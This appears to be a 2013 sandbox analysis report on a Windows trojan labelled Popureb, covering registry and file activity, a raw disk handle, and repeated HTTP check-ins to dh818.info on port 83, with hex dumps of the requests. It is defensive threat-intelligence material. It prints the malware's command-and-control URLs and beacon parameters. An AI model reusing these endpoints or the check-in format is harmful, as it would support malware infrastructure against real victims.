Analysis Date: 2013-10-25 18:57:13
MD5: 3f435e00dd6267f526dfeac8275e6a93
SHA1: 5ccd765a88c0f4a005330b97b01d896302d23ef4

Static Details:

PEhash: c9349374960418540073ffa141aef683c5a4e858
AV (msse): Trojan:Win32/Popureb.C
AV (avg): Generic22.AXB
AV (clamav): Trojan.Onlinegames-2021
AV (avira): TR/Hijacker.Gen
(Vendor labels disagree on the family — Popureb vs. generic OnlineGames/Hijacker names — so treat any single attribution as unconfirmed; the PHYSICALDRIVE0 access in the runtime section is the behaviour worth checking against the Popureb label.)

Runtime Details:

Screenshot

Process
↳ C:\malware.bin

Creates Process: C:\malware.bin  (the sample launches a second copy of itself)

Process
↳ C:\malware.bin

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: PHYSICALDRIVE0  (raw handle to the first physical disk; direct disk access is consistent with the Popureb label above, but this report does not show whether the handle was opened for write or which sectors were touched — verify with a disk/MBR diff of the sandbox image before calling it a bootkit)
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\All Users\Documents\My Videos\PulgFile.log  (dropped file in a shared profile directory; usable as a host-based IOC)
Creates File: \Device\Afd\Endpoint
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex  (together with the index.dat files above this indicates the HTTP traffic below is issued through WinINet, which would also account for the stock IE 6 / Windows XP User-Agent string)
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: IE_2011_Mutex
Winsock DNS: 2.dh818.info
Winsock DNS: 1.dh818.info

Network Details: (1.dh818.info and 2.dh818.info both resolve to 82.98.86.174; all traffic is cleartext HTTP to TCP/83, a non-standard port, over 24 separate short-lived connections — one per GET despite the Connection: Keep-Alive header. The /sms/do.php check-in carries identical userid/time/msg/ver/os/pauid/checkId values on every request, so the time field appears to be set once at start-up rather than per request. No response bodies are shown, so the purpose of the Logo.gif / Pop.gif fetches cannot be determined from this report.)

DNS: 1.dh818.info
Type: A
82.98.86.174
DNS: 2.dh818.info
Type: A
82.98.86.174
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-10-25_17:56:33&msg=01712838524047&ver=2011-4-11&os=Windows%20XP&fy=0&pauid=11911&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2//Logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/2/Pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1033 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1034 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1035 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1036 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1037 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1038 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1039 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1040 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1041 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1042 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1043 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1044 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1045 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1046 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1047 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1048 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1049 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1050 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1051 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1052 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1053 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1054 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1055 ➝ 82.98.86.174:83

Raw Pcap (request headers only, no responses captured. In several of the dumps below the bytes after the terminating 0d0a0d0a — e.g. the stray `lla/4.0 (compa…` / `Host: 2.dh818.info:83` fragment following a request whose own Host is 1.dh818.info, and the `139 31312663   =0&pa` text that is the dump's own ASCII column — are stale contents of the dump buffer left over from an earlier entry, not data sent on the wire; ignore them when writing signatures.)
0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
